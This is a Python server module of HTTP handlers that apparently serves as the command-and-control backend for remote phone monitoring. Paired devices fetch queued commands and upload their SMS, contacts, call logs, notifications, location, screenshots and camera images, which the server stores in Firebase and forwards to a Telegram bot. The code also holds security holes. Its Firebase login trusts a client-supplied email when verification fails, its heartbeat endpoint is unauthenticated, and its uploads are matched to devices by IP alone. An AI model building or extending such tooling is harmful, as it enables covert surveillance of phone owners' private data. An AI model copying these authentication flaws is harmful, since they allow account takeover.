     1→     1→"""
     2→     2→API Handlers - All HTTP/WebSocket request handlers for the Abu-Zahra Server.
     3→     3→Architecture: Client → Server ← {Web Dashboard, Admin App, Telegram Bot}
     4→     4→"""
     5→     5→
     6→     6→import json
     7→     7→import time
     8→     8→import uuid
     9→     9→import base64
    10→    10→import asyncio
    11→    11→import logging
    12→    12→from aiohttp import web, WSMsgType
    13→    13→from datetime import datetime
    14→    14→
    15→    15→from .config import (
    16→    16→    CORS_ORIGINS, VERSION, SERVER_DOMAIN, SERVER_URL,
    17→    17→    MAX_UPLOAD_SIZE, JPEG_STREAM_INTERVAL, STREAM_FRAME_CACHE_SIZE
    18→    18→)
    19→    19→from .store import store
    20→    20→from .commands import COMMAND_REGISTRY, CMD_CATEGORIES, get_all_categories
    21→    21→from . import firebase_client as _fb
    22→    22→from .firebase_client import (
    23→    23→    push_command, store_sms, store_contacts,
    24→    24→    store_calls, store_notifications, store_device_info, store_location
    25→    25→)
    26→    26→from .file_storage import save_upload, save_base64_upload, get_file, get_storage_stats
    27→    27→from .telegram_bot import forward_result
    28→    28→
    29→    29→logger = logging.getLogger("api")
    30→    30→
    31→    31→
    32→    32→# ─── Middleware ────────────────────────────────────────────────
    33→    33→
    34→    34→@web.middleware
    35→    35→async def cors_middleware(request: web.Request, handler):
    36→    36→    if request.method == 'OPTIONS':
    37→    37→        resp = web.Response(status=204)
    38→    38→    else:
    39→    39→        resp = await handler(request)
    40→    40→    
    41→    41→    origin = request.headers.get('Origin', '')
    42→    42→    if origin in CORS_ORIGINS or origin == '':
    43→    43→        resp.headers['Access-Control-Allow-Origin'] = origin or CORS_ORIGINS[0]
    44→    44→    resp.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, DELETE, OPTIONS'
    45→    45→    resp.headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization, X-Device-Token'
    46→    46→    resp.headers['Access-Control-Max-Age'] = '86400'
    47→    47→    return resp
    48→    48→
    49→    49→
    50→    50→def get_auth_session(request: web.Request):
    51→    51→    """Extract and validate session from Authorization header."""
    52→    52→    auth = request.headers.get('Authorization', '')
    53→    53→    if not auth.startswith('Bearer '):
    54→    54→        return None
    55→    55→    token = auth[7:]
    56→    56→    return store.validate_session(token)
    57→    57→
    58→    58→
    59→    59→def get_device_auth(request: web.Request):
    60→    60→    """Extract device_id and validate device token."""
    61→    61→    device_id = request.match_info.get('device_id') or request.query.get('device_id', '')
    62→    62→    token = request.headers.get('X-Device-Token', '')
    63→    63→    if not device_id or not token:
    64→    64→        return None, "Missing device_id or token"
    65→    65→    if not store.validate_device_token(device_id, token):
    66→    66→        return None, "Invalid device token"
    67→    67→    return device_id, None
    68→    68→
    69→    69→
    70→    70→def json_response(data: any, status: int = 200) -> web.Response:
    71→    71→    return web.Response(
    72→    72→        text=json.dumps(data, ensure_ascii=False, default=str),
    73→    73→        content_type='application/json',
    74→    74→        status=status
    75→    75→    )
    76→    76→
    77→    77→
    78→    78→# ─── Public Endpoints ─────────────────────────────────────────
    79→    79→
    80→    80→async def api_health(request: web.Request) -> web.Response:
    81→    81→    store.api_hits += 1
    82→    82→    return json_response({
    83→    83→        "ok": True,
    84→    84→        "status": "running",
    85→    85→        "version": VERSION,
    86→    86→        "firebase": _fb.firebase_connected,
    87→    87→        "uptime": int(time.time() - store.start_time),
    88→    88→        "devices": len(store.devices),
    89→    89→        "commands": len(store.commands),
    90→    90→    })
    91→    91→
    92→    92→
    93→    93→async def api_login(request: web.Request) -> web.Response:
    94→    94→    """Web/Admin login. Accepts username/email + password."""
    95→    95→    store.api_hits += 1
    96→    96→    try:
    97→    97→        body = await request.json()
    98→    98→    except:
    99→    99→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   100→   100→    
   101→   101→    username_or_email = body.get('username', '').strip()
   102→   102→    password = body.get('password', '')
   103→   103→    
   104→   104→    if not username_or_email or not password:
   105→   105→        return json_response({"ok": False, "message": "Missing username or password"}, 400)
   106→   106→    
   107→   107→    user = await store.authenticate_user(username_or_email, password)
   108→   108→    if not user:
   109→   109→        return json_response({"ok": False, "message": "اسم المستخدم أو كلمة المرور غير صحيحة"}, 401)
   110→   110→    
   111→   111→    # Create session
   112→   112→    ip = request.remote or ""
   113→   113→    ua = request.headers.get('User-Agent', '')
   114→   114→    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="web")
   115→   115→    
   116→   116→    await store.add_event("auth", f"User logged in: {user['username']} (web)", "success", user_id=user['id'])
   117→   117→    
   118→   118→    # Get or create permanent link code
   119→   119→    permanent_code = await store.get_or_create_permanent_code(user['id'])
   120→   120→
   121→   121→    # Sync to Firebase
   122→   122→    if _fb.firebase_connected:
   123→   123→        from .firebase_client import sync_permanent_code
   124→   124→        await sync_permanent_code(user['email'], permanent_code, user['id'])
   125→   125→
   126→   126→    return json_response({
   127→   127→        "ok": True,
   128→   128→        "success": True,
   129→   129→        "token": session['token'],
   130→   130→        "expires_at": session['expires_at'],
   131→   131→        "user_id": user['id'],
   132→   132→        "username": user['username'],
   133→   133→        "role": user['role'],
   134→   134→        "email": user['email'],
   135→   135→        "permanent_code": permanent_code,
   136→   136→        "message": "تم تسجيل الدخول بنجاح"
   137→   137→    })
   138→   138→
   139→   139→
   140→   140→async def api_firebase_auth(request: web.Request) -> web.Response:
   141→   141→    """Firebase authentication. Accepts Firebase ID token from Google Sign-In."""
   142→   142→    store.api_hits += 1
   143→   143→    try:
   144→   144→        body = await request.json()
   145→   145→    except:
   146→   146→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   147→   147→    
   148→   148→    firebase_token = body.get('firebase_token', '').strip()
   149→   149→    id_token = body.get('id_token', '').strip()
   150→   150→    email = body.get('email', '').strip().lower()
   151→   151→    display_name = body.get('display_name', '').strip()
   152→   152→    
   153→   153→    # Accept either firebase_token or id_token
   154→   154→    token = firebase_token or id_token
   155→   155→    
   156→   156→    if not email:
   157→   157→        return json_response({"ok": False, "message": "البريد الإلكتروني مطلوب"}, 400)
   158→   158→    
   159→   159→    # Try to verify Firebase token if available
   160→   160→    verified_email = None
   161→   161→    verified_name = None
   162→   162→    if token and _fb.firebase_connected:
   163→   163→        try:
   164→   164→            import requests
   165→   165→            # Verify with Firebase Auth REST API
   166→   166→            resp = requests.get(
   167→   167→                f"https://identitytoolkit.googleapis.com/v1/accounts:lookup?key={token}",
   168→   168→                timeout=5
   169→   169→            )
   170→   170→            if resp.status_code == 200:
   171→   171→                data = resp.json()
   172→   172→                if data.get('users'):
   173→   173→                    user_info = data['users'][0]
   174→   174→                    verified_email = user_info.get('email', '').lower()
   175→   175→                    verified_name = user_info.get('displayName', '') or user_info.get('localId', '')
   176→   176→        except Exception as e:
   177→   177→            logger.warning(f"Firebase token verification failed: {e}")
   178→   178→    
   179→   179→    # Use verified email if available, otherwise trust the provided email
   180→   180→    final_email = verified_email or email
   181→   181→    final_name = verified_name or display_name or final_email.split('@')[0]
   182→   182→    
   183→   183→    # Find or create user
   184→   184→    user = None
   185→   185→    for u in store.users.values():
   186→   186→        if u['email'] == final_email:
   187→   187→            user = u
   188→   188→            break
   189→   189→    
   190→   190→    if not user:
   191→   191→        # Auto-create user from Firebase auth
   192→   192→        try:
   193→   193→            username = final_name.replace(' ', '_').replace('@', '_')[:20]
   194→   194→            # Ensure unique username
   195→   195→            base_username = username
   196→   196→            counter = 1
   197→   197→            while any(u['username'] == username for u in store.users.values()):
   198→   198→                username = f"{base_username}_{counter}"
   199→   199→                counter += 1
   200→   200→            
   201→   201→            user = await store.create_user(
   202→   202→                email=final_email,
   203→   203→                username=username,
   204→   204→                password=str(uuid.uuid4()),  # Random password for Firebase users
   205→   205→                role="user"
   206→   206→            )
   207→   207→            logger.info(f"Auto-created user from Firebase: {username} ({final_email})")
   208→   208→        except ValueError as e:
   209→   209→            return json_response({"ok": False, "message": str(e)}, 400)
   210→   210→    
   211→   211→    if not user.get('is_active', True):
   212→   212→        return json_response({"ok": False, "message": "الحساب معطل"}, 403)
   213→   213→    
   214→   214→    # Create session
   215→   215→    ip = request.remote or ""
   216→   216→    ua = request.headers.get('User-Agent', '')
   217→   217→    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="firebase")
   218→   218→    
   219→   219→    await store.add_event("auth", f"User logged in via Firebase: {user['username']} ({final_email})", "success", user_id=user['id'])
   220→   220→    
   221→   221→    # Get or create permanent link code
   222→   222→    permanent_code = await store.get_or_create_permanent_code(user['id'])
   223→   223→    
   224→   224→    # Sync to Firebase
   225→   225→    if _fb.firebase_connected:
   226→   226→        try:
   227→   227→            from .firebase_client import sync_permanent_code
   228→   228→            await sync_permanent_code(user['email'], permanent_code, user['id'])
   229→   229→        except:
   230→   230→            pass
   231→   231→
   232→   232→    return json_response({
   233→   233→        "ok": True,
   234→   234→        "success": True,
   235→   235→        "token": session['token'],
   236→   236→        "expires_at": session['expires_at'],
   237→   237→        "user_id": user['id'],
   238→   238→        "username": user['username'],
   239→   239→        "role": user['role'],
   240→   240→        "email": user['email'],
   241→   241→        "permanent_code": permanent_code,
   242→   242→        "message": "تم تسجيل الدخول بنجاح"
   243→   243→    })
   244→   244→
   245→   245→
   246→   246→async def api_web_register(request: web.Request) -> web.Response:
   247→   247→    """Register a new user account."""
   248→   248→    store.api_hits += 1
   249→   249→    try:
   250→   250→        body = await request.json()
   251→   251→    except:
   252→   252→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   253→   253→    
   254→   254→    email = body.get('email', '').strip()
   255→   255→    username = body.get('username', '').strip()
   256→   256→    password = body.get('password', '').strip()
   257→   257→    
   258→   258→    if not email or not username or not password:
   259→   259→        return json_response({"ok": False, "message": "جميع الحقول مطلوبة"}, 400)
   260→   260→    
   261→   261→    if len(password) < 6:
   262→   262→        return json_response({"ok": False, "message": "كلمة المرور يجب أن تكون 6 أحرف على الأقل"}, 400)
   263→   263→    
   264→   264→    if '@' not in email:
   265→   265→        return json_response({"ok": False, "message": "بريد إلكتروني غير صالح"}, 400)
   266→   266→    
   267→   267→    try:
   268→   268→        user = await store.create_user(email=email, username=username, password=password, role="user")
   269→   269→    except ValueError as e:
   270→   270→        return json_response({"ok": False, "message": str(e)}, 400)
   271→   271→    
   272→   272→    # Auto-login after registration
   273→   273→    ip = request.remote or ""
   274→   274→    ua = request.headers.get('User-Agent', '')
   275→   275→    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="register")
   276→   276→    
   277→   277→    await store.add_event("auth", f"New user registered: {username} ({email})", "success", user_id=user['id'])
   278→   278→    
   279→   279→    # Get permanent code
   280→   280→    permanent_code = await store.get_or_create_permanent_code(user['id'])
   281→   281→    
   282→   282→    if _fb.firebase_connected:
   283→   283→        try:
   284→   284→            from .firebase_client import sync_permanent_code
   285→   285→            await sync_permanent_code(user['email'], permanent_code, user['id'])
   286→   286→        except:
   287→   287→            pass
   288→   288→    
   289→   289→    return json_response({
   290→   290→        "ok": True,
   291→   291→        "success": True,
   292→   292→        "token": session['token'],
   293→   293→        "expires_at": session['expires_at'],
   294→   294→        "user_id": user['id'],
   295→   295→        "username": user['username'],
   296→   296→        "role": user['role'],
   297→   297→        "email": user['email'],
   298→   298→        "permanent_code": permanent_code,
   299→   299→        "message": "تم إنشاء الحساب بنجاح"
   300→   300→    })
   301→   301→
   302→   302→
   303→   303→# ─── Device API (authenticated by device token) ───────────────
   304→   304→
   305→   305→async def api_register(request: web.Request) -> web.Response:
   306→   306→    """Device registration using pairing code."""""
   307→   307→    store.api_hits += 1
   308→   308→    try:
   309→   309→        body = await request.json()
   310→   310→    except:
   311→   311→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   312→   312→    
   313→   313→    device_id = body.get('device_id', '')
   314→   314→    link_code = body.get('link_code', '')
   315→   315→    device_token = body.get('device_token', '') or body.get('token', '')
   316→   316→    model = body.get('device_model', '') or body.get('model', '')
   317→   317→    brand = body.get('brand', '')
   318→   318→    os_version = body.get('os_version', '') or body.get('android', '')
   319→   319→    
   320→   320→    if not device_id or not link_code:
   321→   321→        return json_response({"ok": False, "message": "Missing device_id or link_code"}, 400)
   322→   322→    
   323→   323→    # Verify pairing code
   324→   324→    code_data = await store.verify_pairing_code(link_code)
   325→   325→    if not code_data:
   326→   326→        return json_response({"ok": False, "message": "كود الربط غير صالح أو منتهي الصلاحية"}, 400)
   327→   327→    
   328→   328→    # Register device
   329→   329→    device = await store.register_device(
   330→   330→        device_id=device_id,
   331→   331→        token=device_token,
   332→   332→        pairing_code=link_code,
   333→   333→        model=model,
   334→   334→        brand=brand,
   335→   335→        os_version=os_version,
   336→   336→        user_id=code_data.get('user_id'),
   337→   337→    )
   338→   338→    
   339→   339→    if not device:
   340→   340→        return json_response({"ok": False, "message": "فشل تسجيل الجهاز"}, 500)
   341→   341→    
   342→   342→    return json_response({
   343→   343→        "ok": True,
   344→   344→        "success": True,
   345→   345→        "device_id": device_id,
   346→   346→        "device_token": device_token,
   347→   347→        "server_domain": SERVER_DOMAIN,
   348→   348→        "message": "تم تسجيل الجهاز بنجاح"
   349→   349→    })
   350→   350→
   351→   351→
   352→   352→async def api_get_commands(request: web.Request) -> web.Response:
   353→   353→    """Device fetches pending commands."""
   354→   354→    device_id, error = get_device_auth(request)
   355→   355→    if error:
   356→   356→        return json_response({"ok": False, "message": error}, 401)
   357→   357→    
   358→   358→    commands = await store.get_pending_commands(device_id)
   359→   359→    
   360→   360→    # Mark as sent
   361→   361→    for cmd in commands:
   362→   362→        cmd['sent_at'] = datetime.utcnow().isoformat()
   363→   363→    
   364→   364→    return json_response({
   365→   365→        "ok": True,
   366→   366→        "commands": commands,
   367→   367→        "count": len(commands),
   368→   368→        "server_time": datetime.utcnow().isoformat(),
   369→   369→    })
   370→   370→
   371→   371→
   372→   372→async def api_command_result(request: web.Request) -> web.Response:
   373→   373→    """Device submits command result."""
   374→   374→    store.api_hits += 1
   375→   375→    command_id = request.match_info.get('command_id', '')
   376→   376→    device_id, error = get_device_auth(request)
   377→   377→    if error:
   378→   378→        return json_response({"ok": False, "message": error}, 401)
   379→   379→    
   380→   380→    try:
   381→   381→        body = await request.json()
   382→   382→    except:
   383→   383→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   384→   384→    
   385→   385→    status = body.get('status', 'completed')
   386→   386→    result = body.get('result', '')
   387→   387→    
   388→   388→    updated = await store.update_command_result(command_id, status, result)
   389→   389→    
   390→   390→    # Forward result to Telegram if pending
   391→   391→    if updated and command_id in store.pending_messages:
   392→   392→        await forward_result(command_id, result)
   393→   393→    
   394→   394→    # Store text data in Firebase
   395→   395→    if updated and isinstance(result, str) and len(result) < 50000:
   396→   396→        cmd = store.commands.get(command_id, {})
   397→   397→        cmd_name = cmd.get('command', '')
   398→   398→        
   399→   399→        if cmd_name in ('get_sms',):
   400→   400→            await store_sms(device_id, json.loads(result) if result.startswith('[') else result)
   401→   401→        elif cmd_name in ('get_contacts',):
   402→   402→            await store_contacts(device_id, json.loads(result) if result.startswith('[') else result)
   403→   403→        elif cmd_name in ('get_calls',):
   404→   404→            await store_calls(device_id, json.loads(result) if result.startswith('[') else result)
   405→   405→        elif cmd_name in ('get_notifications',):
   406→   406→            await store_notifications(device_id, json.loads(result) if result.startswith('[') else result)
   407→   407→        elif cmd_name in ('get_location',):
   408→   408→            await store_location(device_id, json.loads(result) if result.startswith('{') else result)
   409→   409→        elif cmd_name in ('get_info', 'get_battery', 'get_wifi_info', 'get_network_info',
   410→   410→                          'get_sim_info', 'get_storage_info'):
   411→   411→            await store_device_info(device_id, json.loads(result) if result.startswith('{') else {"raw": result})
   412→   412→    
   413→   413→    # Handle base64 image results - save as temp file
   414→   414→    if updated and isinstance(result, str) and len(result) > 10000 and result.startswith('/9j/'):
   415→   415→        try:
   416→   416→            img_bytes = base64.b64decode(result)
   417→   417→            await save_upload(device_id, img_bytes, f"screenshot_{command_id}.jpg",
   418→   418→                            file_type="screenshot", command_id=command_id)
   419→   419→            # Cache for streaming
   420→   420→            store.latest_frames[f"{device_id}:video"] = {
   421→   421→                "data": result,
   422→   422→                "timestamp": time.time(),
   423→   423→                "source": "screenshot",
   424→   424→            }
   425→   425→        except Exception as e:
   426→   426→            logger.error(f"Failed to save screenshot: {e}")
   427→   427→    
   428→   428→    return json_response({"ok": True, "success": True, "message": "Result received"})
   429→   429→
   430→   430→
   431→   431→async def api_device_data(request: web.Request) -> web.Response:
   432→   432→    """Device sends typed data (location, battery, events, etc.)."""
   433→   433→    device_id, error = get_device_auth(request)
   434→   434→    if error:
   435→   435→        return json_response({"ok": False, "message": error}, 401)
   436→   436→    
   437→   437→    try:
   438→   438→        body = await request.json()
   439→   439→    except:
   440→   440→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   441→   441→    
   442→   442→    data_type = body.get('type', '')
   443→   443→    data = body.get('data', {})
   444→   444→    command = body.get('command', '')
   445→   445→    
   446→   446→    # Store in Firebase for text data
   447→   447→    if data_type == 'location' and data:
   448→   448→        await store_location(device_id, data)
   449→   449→    elif data_type == 'sms' and data:
   450→   450→        await store_sms(device_id, data if isinstance(data, list) else [data])
   451→   451→    elif data_type == 'contacts' and data:
   452→   452→        await store_contacts(device_id, data if isinstance(data, list) else [data])
   453→   453→    elif data_type == 'calls' and data:
   454→   454→        await store_calls(device_id, data if isinstance(data, list) else [data])
   455→   455→    elif data_type == 'notifications' and data:
   456→   456→        await store_notifications(device_id, data if isinstance(data, list) else [data])
   457→   457→    elif data_type == 'device_info' and data:
   458→   458→        await store_device_info(device_id, data)
   459→   459→    
   460→   460→    # Update device info
   461→   461→    if data_type == 'location' and isinstance(data, dict):
   462→   462→        await store.update_device(device_id, {"location": data})
   463→   463→    elif data_type == 'battery' and isinstance(data, (int, float)):
   464→   464→        await store.update_device(device_id, {"battery": data})
   465→   465→    
   466→   466→    return json_response({"ok": True, "success": True, "message": "Data stored"})
   467→   467→
   468→   468→
   469→   469→async def api_heartbeat(request: web.Request) -> web.Response:
   470→   470→    """Device heartbeat."""
   471→   471→    store.api_hits += 1
   472→   472→    try:
   473→   473→        body = await request.json()
   474→   474→    except:
   475→   475→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   476→   476→    
   477→   477→    device_id = body.get('device_id', '')
   478→   478→    status = body.get('status', 'online')
   479→   479→    battery = body.get('battery')
   480→   480→    
   481→   481→    if not device_id:
   482→   482→        return json_response({"ok": False, "message": "Missing device_id"}, 400)
   483→   483→    
   484→   484→    await store.update_heartbeat(device_id, status, battery)
   485→   485→    
   486→   486→    return json_response({"ok": True, "success": True, "message": "Heartbeat received"})
   487→   487→
   488→   488→
   489→   489→async def api_device_event(request: web.Request) -> web.Response:
   490→   490→    """Device sends events."""
   491→   491→    device_id, error = get_device_auth(request)
   492→   492→    if error:
   493→   493→        return json_response({"ok": False, "message": error}, 401)
   494→   494→    
   495→   495→    try:
   496→   496→        body = await request.json()
   497→   497→    except:
   498→   498→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   499→   499→    
   500→   500→    event_type = body.get('event_type', '')
   501→   501→    data = body.get('data', {})
   502→   502→    
   503→   503→    await store.add_event("device", str(data)[:200], "info", device_id=device_id, details=event_type)
   504→   504→    
   505→   505→    return json_response({"ok": True, "stored": True})
   506→   506→
   507→   507→
   508→   508→async def api_upload_file(request: web.Request) -> web.Response:
   509→   509→    """Multipart file upload."""
   510→   510→    store.api_hits += 1
   511→   511→    
   512→   512→    # Get device_id from form or IP map
   513→   513→    device_id = None
   514→   514→    token = request.headers.get('X-Device-Token', '')
   515→   515→    
   516→   516→    try:
   517→   517→        reader = await request.multipart()
   518→   518→        fields = {}
   519→   519→        file_data = None
   520→   520→        filename = ""
   521→   521→        
   522→   522→        async for field in reader:
   523→   523→            if field.name == 'file':
   524→   524→                file_data = await field.read(decode=False)
   525→   525→                filename = field.filename or "unknown"
   526→   526→            else:
   527→   527→                fields[field.name] = (await field.read(decode=True)).decode('utf-8', errors='replace')
   528→   528→        
   529→   529→        device_id = fields.get('device_id', '')
   530→   530→        if not device_id:
   531→   531→            device_id = store._ip_device_map.get(request.remote, '')
   532→   532→        
   533→   533→        if not device_id:
   534→   534→            return json_response({"ok": False, "message": "Unknown device"}, 400)
   535→   535→        
   536→   536→        file_type = fields.get('file_type', 'file')
   537→   537→        command_id = fields.get('command_id', '')
   538→   538→        caption = fields.get('caption', '')
   539→   539→        
   540→   540→        if not file_data:
   541→   541→            return json_response({"ok": False, "message": "No file data"}, 400)
   542→   542→        
   543→   543→        if len(file_data) > MAX_UPLOAD_SIZE:
   544→   544→            return json_response({"ok": False, "message": "File too large"}, 413)
   545→   545→        
   546→   546→        file_meta = await save_upload(device_id, file_data, filename, file_type, command_id, caption)
   547→   547→        
   548→   548→        return json_response({
   549→   549→            "ok": True,
   550→   550→            "file_id": file_meta['id'],
   551→   551→            "file_name": filename,
   552→   552→            "file_size": len(file_data),
   553→   553→        })
   554→   554→    except Exception as e:
   555→   555→        logger.error(f"Upload error: {e}")
   556→   556→        return json_response({"ok": False, "message": str(e)}, 500)
   557→   557→
   558→   558→
   559→   559→async def api_upload_base64(request: web.Request) -> web.Response:
   560→   560→    """Base64 file upload."""
   561→   561→    store.api_hits += 1
   562→   562→    device_id, error = get_device_auth(request)
   563→   563→    if error:
   564→   564→        return json_response({"ok": False, "message": error}, 401)
   565→   565→    
   566→   566→    try:
   567→   567→        body = await request.json()
   568→   568→    except:
   569→   569→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   570→   570→    
   571→   571→    base64_data = body.get('base64_data', '')
   572→   572→    filename = body.get('filename', 'upload.jpg')
   573→   573→    file_type = body.get('file_type', 'file')
   574→   574→    command_id = body.get('command_id', '')
   575→   575→    caption = body.get('caption', '')
   576→   576→    
   577→   577→    if not base64_data:
   578→   578→        return json_response({"ok": False, "message": "No base64 data"}, 400)
   579→   579→    
   580→   580→    try:
   581→   581→        file_meta = await save_base64_upload(device_id, base64_data, filename, file_type, command_id, caption)
   582→   582→        
   583→   583→        # Cache images for streaming viewer
   584→   584→        if file_type in ('photo', 'screenshot', 'camera') and base64_data.startswith('/9j/'):
   585→   585→            store.latest_frames[f"{device_id}:video"] = {
   586→   586→                "data": base64_data,
   587→   587→                "timestamp": time.time(),
   588→   588→                "source": file_type,
   589→   589→            }
   590→   590→        
   591→   591→        return json_response({
   592→   592→            "ok": True,
   593→   593→            "file_id": file_meta['id'],
   594→   594→            "file_name": filename,
   595→   595→        })
   596→   596→    except ValueError as e:
   597→   597→        return json_response({"ok": False, "message": str(e)}, 400)
   598→   598→    except Exception as e:
   599→   599→        return json_response({"ok": False, "message": str(e)}, 500)
   600→   600→
   601→   601→
   602→   602→async def api_download_file(request: web.Request) -> web.Response:
   603→   603→    """Download a file by file_id."""
   604→   604→    file_id = request.match_info.get('file_id', '')
   605→   605→    session = get_auth_session(request)
   606→   606→    
   607→   607→    if not session:
   608→   608→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   609→   609→    
   610→   610→    data, meta = await get_file(file_id)
   611→   611→    if not data:
   612→   612→        return json_response({"ok": False, "message": "File not found or expired"}, 404)
   613→   613→    
   614→   614→    content_type = {
   615→   615→        'photo': 'image/jpeg', 'screenshot': 'image/jpeg', 'camera': 'image/jpeg',
   616→   616→        'video': 'video/mp4', 'audio': 'audio/mpeg', 'file': 'application/octet-stream'
   617→   617→    }.get(meta.get('file_type', ''), 'application/octet-stream')
   618→   618→    
   619→   619→    return web.Response(
   620→   620→        body=data,
   621→   621→        content_type=content_type,
   622→   622→        headers={
   623→   623→            'Content-Disposition': f'attachment; filename="{meta["filename"]}"',
   624→   624→            'Content-Length': str(len(data)),
   625→   625→        }
   626→   626→    )
   627→   627→
   628→   628→
   629→   629→async def api_device_settings(request: web.Request) -> web.Response:
   630→   630→    """Device fetches settings."""
   631→   631→    device_id = request.match_info.get('device_id', '')
   632→   632→    return json_response({
   633→   633→        "ok": True,
   634→   634→        "settings": {
   635→   635→            "sync_interval": store.settings.get('sync_interval', 15),
   636→   636→            "location_interval": store.settings.get('location_interval', 300),
   637→   637→            "auto_location": store.settings.get('auto_location', False),
   638→   638→            "auto_sync": store.settings.get('auto_sync', True),
   639→   639→        }
   640→   640→    })
   641→   641→
   642→   642→
   643→   643→# ─── Authenticated Web/Admin API ──────────────────────────────
   644→   644→
   645→   645→async def api_web_devices(request: web.Request) -> web.Response:
   646→   646→    session = get_auth_session(request)
   647→   647→    if not session:
   648→   648→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   649→   649→    
   650→   650→    devices = await store.get_user_devices(session['user_id'])
   651→   651→    # Add online status
   652→   652→    result = []
   653→   653→    for d in devices:
   654→   654→        dev = dict(d)
   655→   655→        dev['online'] = store._device_last_online.get(d['id'], False)
   656→   656→        result.append(dev)
   657→   657→    
   658→   658→    return json_response({"ok": True, "devices": result})
   659→   659→
   660→   660→
   661→   661→async def api_web_device_detail(request: web.Request) -> web.Response:
   662→   662→    session = get_auth_session(request)
   663→   663→    if not session:
   664→   664→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   665→   665→    
   666→   666→    device_id = request.match_info.get('device_id', '')
   667→   667→    device = await store.get_user_device(session['user_id'], device_id)
   668→   668→    if not device:
   669→   669→        return json_response({"ok": False, "message": "Device not found"}, 404)
   670→   670→    
   671→   671→    dev = dict(device)
   672→   672→    dev['online'] = store._device_last_online.get(device_id, False)
   673→   673→    commands = await store.get_commands_history(device_id, limit=20)
   674→   674→    
   675→   675→    return json_response({"ok": True, "device": dev, "commands": commands})
   676→   676→
   677→   677→
   678→   678→async def api_web_commands(request: web.Request) -> web.Response:
   679→   679→    session = get_auth_session(request)
   680→   680→    if not session:
   681→   681→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   682→   682→    
   683→   683→    commands = await store.get_commands_history(limit=100)
   684→   684→    return json_response({"ok": True, "commands": commands})
   685→   685→
   686→   686→
   687→   687→async def api_web_events(request: web.Request) -> web.Response:
   688→   688→    session = get_auth_session(request)
   689→   689→    if not session:
   690→   690→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   691→   691→    
   692→   692→    device_id = request.query.get('device_id', '')
   693→   693→    event_type = request.query.get('type', '')
   694→   694→    events = await store.get_events(device_id=device_id or None, event_type=event_type or None, limit=100)
   695→   695→    return json_response({"ok": True, "events": events})
   696→   696→
   697→   697→
   698→   698→async def api_web_stats(request: web.Request) -> web.Response:
   699→   699→    session = get_auth_session(request)
   700→   700→    if not session:
   701→   701→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   702→   702→    
   703→   703→    stats = store.get_stats()
   704→   704→    stats['storage'] = get_storage_stats()
   705→   705→    return json_response({"ok": True, "stats": stats})
   706→   706→
   707→   707→
   708→   708→async def api_web_send_command(request: web.Request) -> web.Response:
   709→   709→    session = get_auth_session(request)
   710→   710→    if not session:
   711→   711→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   712→   712→    
   713→   713→    try:
   714→   714→        body = await request.json()
   715→   715→    except:
   716→   716→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   717→   717→    
   718→   718→    device_id = body.get('device_id', '')
   719→   719→    command = body.get('command', '')
   720→   720→    params = body.get('params', {})
   721→   721→    
   722→   722→    if not device_id or not command:
   723→   723→        return json_response({"ok": False, "message": "Missing device_id or command"}, 400)
   724→   724→    
   725→   725→    # Check device ownership
   726→   726→    device = await store.get_user_device(session['user_id'], device_id)
   727→   727→    if not device:
   728→   728→        return json_response({"ok": False, "message": "Device not found or access denied"}, 404)
   729→   729→    
   730→   730→    # Look up the actual command
   731→   731→    cmd_def = COMMAND_REGISTRY.get(command, {})
   732→   732→    actual_cmd = cmd_def.get('cmd', command)
   733→   733→    actual_params = cmd_def.get('params', {})
   734→   734→    if params:
   735→   735→        actual_params.update(params)
   736→   736→    
   737→   737→    # Rate limit
   738→   738→    if not store.check_rate_limit(f"cmd_{session['user_id']}", 20, 60):
   739→   739→        return json_response({"ok": False, "message": "Rate limited"}, 429)
   740→   740→    
   741→   741→    # Queue command
   742→   742→    queued = await store.queue_command(
   743→   743→        device_id=device_id,
   744→   744→        command=actual_cmd,
   745→   745→        params=actual_params,
   746→   746→        requested_by=session['user_id'],
   747→   747→        source="web"
   748→   748→    )
   749→   749→    
   750→   750→    # Push to Firebase
   751→   751→    if _fb.firebase_connected:
   752→   752→        await push_command(device_id, {
   753→   753→            "id": queued['id'],
   754→   754→            "command": actual_cmd,
   755→   755→            "params": actual_params,
   756→   756→            "created_at": queued['created_at'],
   757→   757→        })
   758→   758→    
   759→   759→    await store.add_event("command", f"Command queued: {actual_cmd} -> {device_id}",
   760→   760→                         "info", device_id=device_id, user_id=session['user_id'])
   761→   761→    
   762→   762→    return json_response({"ok": True, "command": queued})
   763→   763→
   764→   764→
   765→   765→async def api_web_link_code(request: web.Request) -> web.Response:
   766→   766→    session = get_auth_session(request)
   767→   767→    if not session:
   768→   768→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   769→   769→    
   770→   770→    code_data = store.generate_pairing_code(session['user_id'])
   771→   771→    return json_response({"ok": True, "code": code_data['code'], "session_id": code_data['session_id']})
   772→   772→
   773→   773→
   774→   774→async def api_web_settings_get(request: web.Request) -> web.Response:
   775→   775→    session = get_auth_session(request)
   776→   776→    if not session:
   777→   777→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   778→   778→    
   779→   779→    return json_response({"ok": True, "settings": store.settings})
   780→   780→
   781→   781→
   782→   782→async def api_web_settings_set(request: web.Request) -> web.Response:
   783→   783→    session = get_auth_session(request)
   784→   784→    if not session:
   785→   785→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   786→   786→    
   787→   787→    if session['role'] != 'admin':
